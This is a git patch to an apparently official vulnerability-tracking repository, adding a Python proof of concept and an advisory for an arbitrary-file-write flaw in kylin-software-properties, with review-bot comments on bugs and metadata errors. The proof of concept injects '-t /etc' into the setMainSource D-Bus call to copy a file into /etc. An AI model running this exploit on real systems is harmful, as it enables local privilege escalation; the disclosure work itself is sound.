From da8576a79ef6364b251d6d0a6f6cfa08f4c320cd Mon Sep 17 00:00:00 2001
From: yangjipeng
Date: Fri, 21 Oct 2022 09:54:42 +0800
Subject: [PATCH] ADD KVE-2022-0212
---
 .../2022/KVE-2022-0210/poc.py | 16 ++++++++++++++++
 .../2022/yaml/KVE-2022-0210.yaml | 19 +++++++++++++++++++
 vulnerability_list.yaml | 4 +++-
 3 files changed, 38 insertions(+), 1 deletion(-)
 create mode 100644 kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
 create mode 100644 kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
diff --git a/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
new file mode 100644
index 00000000..19f07b57
--- /dev/null
+++ b/kve/kylin-software-properties/2022/KVE-2022-0210/poc.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+
+import sys
+import dbus
+import os
+
+def set_main_source(target_dir, src_file):
+ bus = dbus.SystemBus()
+ obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties")
+ proxy = dbus.Interface(obj, "com.kylin.software.properties.interface")
+ proxy.setMainSource([f'-t {target_dir} {src_file}'])
+ os.system('touch set_main_source.txt')
+
+set_main_source("/etc", os.path.realpath('./set_main_source.txt'))
+os.system('ls -l /etc/set_main_source.txt')
+os.system('rm set_main_source.txt')
\ No newline at end of file
diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
new file mode 100644
index 00000000..60a558db
--- /dev/null
+++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
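Review bot: In poc.py the marker file is created by `os.system('touch set_main_source.txt')` only after `proxy.setMainSource(...)` has returned, so (assuming the D-Bus call is synchronous) the path handed to the service does not exist yet and the closing `ls -l` can make an unpatched host look unaffected; create the file before the call, for example `open(src_file, 'a').close()` as the first statement of `set_main_source`. The last line removes only the local copy, so on an affected system `/etc/set_main_source.txt` stays behind, and the script should say so and tell the tester to remove it. The result would be easier to consume as an exit status derived from `os.path.exists('/etc/set_main_source.txt')` than as printed `ls` output, and `import sys` is unused.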
@@ -0,0 +1,19 @@
+id: KVE-2022-0210
+source: openKylin Community
+info:
+ name: 源管理服务的setMainSource接口任意文件写入漏洞。
+ severity: critical
+ description: |
+ com.kylin.software.properties.interface.setMainSource接口存在任意文件写入漏洞。实现方法是调用命令"cp file /etc/apt/sources.list"。但如果传递的参数为"['-t /etc /path/to/evil.txt'],由于开发者在实现时会将这个字符串按空格进行分割,并作为参数传递到cp命令,因此就会触发命令 "cp -t /etc /path/to/evil.txt /etc/apt/sources.list",从而实现任意文件夹的任意文件写入,导致权限提升。任意命令。
+ scope-of-influence:
+ kylin-software-properties< 0.0.1-127
+ reference:
+ - https://kylinos.cn/support/loophole/patch/1871.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: None
+ cwe-id: None
+ cnvd-id: None
+ kve-id: KVE-2022-0210
+ tags: kve2022,dbus
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 1148d39b..475177cc 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -22,4 +22,6 @@ cve:
 polkit:
 - CVE-2021-4034
 cnvd:
-kve:
\ No newline at end of file
+kve:
+ kylin-software-properties
+ - KVE-2022-0210
\ No newline at end of file
-- Gitee
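Review bot: In KVE-2022-0210.yaml, `severity: critical` disagrees with `cvss-score: 7.8` and the vector on the `cvss-metrics` line, which place the issue in the CVSS 3.1 High band (7.0–8.9); one of them should change, e.g. `severity: high`. In `description` the quoted argument `"['-t /etc /path/to/evil.txt']` is missing its closing quote and the text ends with the stray fragment `任意命令。`. `cwe-id: None` could probably be filled in, since the description reads like argument injection into `cp` (CWE-88), to be confirmed by the author. The commit subject names KVE-2022-0212 while `id` and `kve-id` here say KVE-2022-0210, so one of the two looks like a typo.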
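Review bot: In vulnerability_list.yaml the added line `kylin-software-properties` has no trailing colon, unlike `polkit:` in the context lines above, so a YAML parser will not treat it as a key holding the list item `- KVE-2022-0210` and will most likely fold both lines into one plain string under `kve:`. It should read `kylin-software-properties:`. The file also still ends without a newline.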